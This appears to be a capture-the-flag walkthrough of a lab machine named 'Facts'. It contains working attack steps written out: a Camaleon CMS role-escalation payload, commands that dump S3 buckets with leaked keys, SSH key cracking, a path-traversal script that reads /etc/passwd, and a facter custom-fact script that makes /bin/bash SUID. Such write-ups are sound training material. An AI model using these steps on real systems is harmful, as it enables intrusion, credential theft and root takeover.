Facts

External Enumeration

Nmap

nmap -sC -sV -T4 -p- facts.htb

22/tcp    open  ssh     OpenSSH 9.9p1 Ubuntu 3ubuntu3.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 4d:d7:b2:8c:d4:df:57:9c:a4:2f:df:c6:e3:01:29:89 (ECDSA)
|_  256 a3:ad:6b:2f:4a:bf:6f:48:ac:81:b9:45:3f:de:fb:87 (ED25519)
80/tcp    open  http    nginx 1.26.3 (Ubuntu)
|_http-server-header: nginx/1.26.3 (Ubuntu)
|_http-title: facts
54321/tcp open  unknown

sudo nmap -A -sU --top-port 100 facts.htb
68/udp open|filtered dhcpc

Vhosts - No Results

ffuf -w /opt/useful/seclists/Discovery/DNS/subdomains-top1million-20000.txt -u http://10.129.221.197 -H 'Host: FUZZ.facts.htb'

Directory

ffuf -u http://facts.htb/FUZZ -w /opt/useful/seclists/Discovery/Web-Content/raft-medium-words-lowercase.txt -fc 403,404

admin                 [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 405ms]

SSH (21) - No Anonymous Access 

ssh anonymous@facts.htb

HTTP (80)

  • Able to find login page on http://facts.htb/admin
  • Create account and login
  • Shows version Camaleon CMS Version 2.9.0
  • Searching for CVE https://www.tenable.com/security/research/tra-2025-09
def updated_ajax
  @user = current_site.users.find(params[:user_id])
  update_session = current_user_is?(@user)

  @user.update(params.require(:password).permit!)
  render inline: @user.errors.full_messages.join(', ')

  # keep user logged in when changing their own password
  update_auth_token_in_cookie @user.auth_token if update_session && @user.saved_change_to_password_digest?
end
  • When updating the use password, you can update the role as well
  • append to password update request
&password%5Brole%5D=admin
  • Logging back in as user2:admin we are now an administrator
  • Checking user comments, may be users bob carol dave

Enumerating as user2 admin

  • General Site → Filesystem Settings → Found S3 Credentials
Aws s3 access key (*) - AKIA03BA7211D1651F7A
Aws s3 secret key (*) - 8poFcD90w24gUrJBYo95Rcy5dzF3FQtjeBJG0dAQ
Aws s3 bucket name (*) - randomfacts
Aws s3 region (*) - us-east-1
Aws s3 bucket endpoint - http://localhost:54321
Cloudfront url - http://facts.htb/randomfacts
  • Setup S3 Profile
aws configure --profile htb
  • Test connection / List files
aws s3 ls s3://randomfacts --endpoint-url http://10.129.221.197:54321 --profile htb
                           PRE thumb/
2025-09-11 08:07:06     446847 animalejected.png
2025-09-11 08:07:06     271210 annefrankasteroid.png
2025-09-11 08:07:06     255778 catsattachment.png
2025-09-11 08:07:05     411597 cuteanimals.png
2025-09-11 08:07:05     177331 darkchocolate.png
2025-09-11 08:07:05     312753 dogscatssmell.png
2025-09-11 08:07:04     922561 dolphinfact.png
2025-09-11 08:07:04      67352 finlandhappiest.png
2025-09-11 08:07:04     388178 firstimpressions.png
2025-09-11 08:07:04     100689 firsttransaction.png
2025-09-11 08:07:03     222436 firstwebcam.png
2025-09-11 08:07:03     128158 georgewashingtonslaves.png
2025-09-11 08:07:03      34816 logopage.png
2025-09-11 08:07:03      16886 logopage2.png
2025-09-11 08:07:02      80796 pressureupbeat.png
2025-09-11 08:07:02      24792 primary-question-mark.png
2025-09-11 08:07:02     341284 smallanimals.png
2025-09-11 08:07:02     332397 superiorpeople.png
2025-09-11 08:07:01      39579 vanilla.png
2025-09-11 08:07:01      35769 youtubewatchhours.png
  • Download all files from S3, Nothing important
aws s3 sync s3://randomfacts ./bucket_dump --endpoint-url http://10.129.221.197:54321 --profile htb
  • Check for other S3 Buckets
  • Internal sounds important
aws s3 ls --endpoint-url http://10.129.221.197:54321 --profile htb
2025-09-11 08:06:52 internal
2025-09-11 08:06:52 randomfacts
  • Listing all files in Internal
  • Found SSH Keys
  • Download Files
aws s3 ls s3://internal --recursive --endpoint-url http://10.129.221.197:54321 --profile htb

aws s3 sync s3://internal ./internal --endpoint-url http://10.129.221.197:54321 --profile htb

2026-01-31 16:14:28         82 .ssh/authorized_keys
2026-01-31 16:14:28        464 .ssh/id_ed25519
  • Crack SSH hash
ssh2john id_ed25519 > ssh_hash.txt
john ssh_hash.txt --wordlist=/usr/share/wordlists/rockyou.txt

dragonballz

Finding Username

https://github.com/Goultarde/CVE-2024-46987/blob/main/CVE-2024-46987.py
python3 CVE-2024-46987.py -u http://facts.htb --user user2 -p admin /etc/passwd |tail

syslog:x:104:104::/nonexistent:/usr/sbin/nologin
uuidd:x:105:105::/run/uuidd:/usr/sbin/nologin
tcpdump:x:106:107::/nonexistent:/usr/sbin/nologin
tss:x:107:108:TPM software stack,,,:/var/lib/tpm:/bin/false
landscape:x:108:109::/var/lib/landscape:/usr/sbin/nologin
fwupd-refresh:x:989:989:Firmware update daemon:/var/lib/fwupd:/usr/sbin/nologin
sshd:x:109:65534::/run/sshd:/usr/sbin/nologin
trivia:x:1000:1000:facts.htb:/home/trivia:/bin/bash
william:x:1001:1001::/home/william:/bin/bash
_laurel:x:101:988::/var/log/laurel:/bin/false

Shell as trivia on facts.htb

ssh -i id_ed25519 trivia@facts.htb

trivia@facts:/home/william$ cat user.txt
d6dde563fba1de8d271dadd0ea66bf84
  • User has permissions over facter
sudo -l
User trivia may run the following commands on facts:
    (ALL) NOPASSWD: /usr/bin/facter

Exploit Facter

  • Factor supports loading custom scripts from user-defined directories
cd tmp
mkdir exploit
cd exploit
cat > exploit.rb << 'EOF'
#!/usr/bin/env ruby
puts "custom_fact=exploited"
system("chmod +s /bin/bash")
EOF
  • run sudo with facter script
sudo /usr/bin/facter --custom-dir=/tmp/exploit_facts/ x
trivia@facts:/tmp/exploit_facts$ ls -al /bin/bash
-rwsr-sr-x 1 root root 1740896 Mar  5  2025 /bin/bash
bash-5.2# cat root.txt
bbce0238939b7649f3b685d0c15b1881